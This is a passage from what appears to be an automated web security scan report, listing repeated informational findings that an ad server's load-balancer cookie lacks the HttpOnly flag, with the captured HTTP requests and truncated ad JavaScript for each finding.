Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:59:17 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4259
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/91369350/Middle/D
...[SNIP]...

14.384. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1829762158@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1829762158@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1829762158@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:53:19 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4575
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1841533540/Middle
...[SNIP]...

14.385. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1833270613@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1833270613@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1833270613@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:56:52 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4864
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/957722198/Middle/
...[SNIP]...

14.386. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1850925027@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1850925027@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1850925027@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 03:01:13 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4267
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1018018031/Middle
...[SNIP]...

14.387. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1858082296@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1858082296@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1858082296@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 03:01:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4569
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1919132365/Middle
...[SNIP]...

14.388. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1864556706@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1864556706@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1864556706@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:59:20 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4570
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2027813664/Middle
...[SNIP]...

14.389. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1867138594@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1867138594@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1867138594@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:59:15 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4328
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1325970382/Middle
...[SNIP]...

14.390. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1883135457@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1883135457@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1883135457@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:53:03 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4326
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/574701930/Middle/
...[SNIP]...

14.391. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1884033313@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1884033313@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1884033313@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:59:16 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4574
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1676958441/Middle
...[SNIP]...

14.392. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1886073438@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1886073438@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1886073438@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:55:48 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4564
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/67159038/Middle/D
...[SNIP]...

14.393. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1897549465@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1897549465@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1897549465@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:59:12 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4513
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/815723633/Middle/
...[SNIP]...

14.394. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1913132077@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1913132077@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1913132077@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:56:26 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4513
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1379732218/Middle
...[SNIP]...

14.395. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1921485874@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1921485874@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1921485874@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:53:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4620
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1664822342/Middle
...[SNIP]...

14.396. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1928213543@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1928213543@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1928213543@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 03:00:12 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4326
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/156765544/Middle/
...[SNIP]...

14.397. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1931333150@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1931333150@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1931333150@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:53:35 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4267
Content-Type: application/x-javascript
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

function OAS_RICH(position) {
if (position == 'Middle') {
document.write ('<A HREF="http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1645991668/Middle
...[SNIP]...

14.398. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1945288333@Top,Middle,Right,Right1,x01,x02,x03,x04

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1945288333@Top,Middle,Right,Right1,x01,x02,x03,x04

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1945288333@Top,Middle,Right,Right1,x01,x02,x03,x04? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: oasc05139.247realmedia.com
Cookie: OAX=rcHW800+NG4ADRRy; NSC_d17efm_qppm_iuuq=ffffffff09499e3845525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 02:54:34 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 4830
Content-Type: application/x-javascript
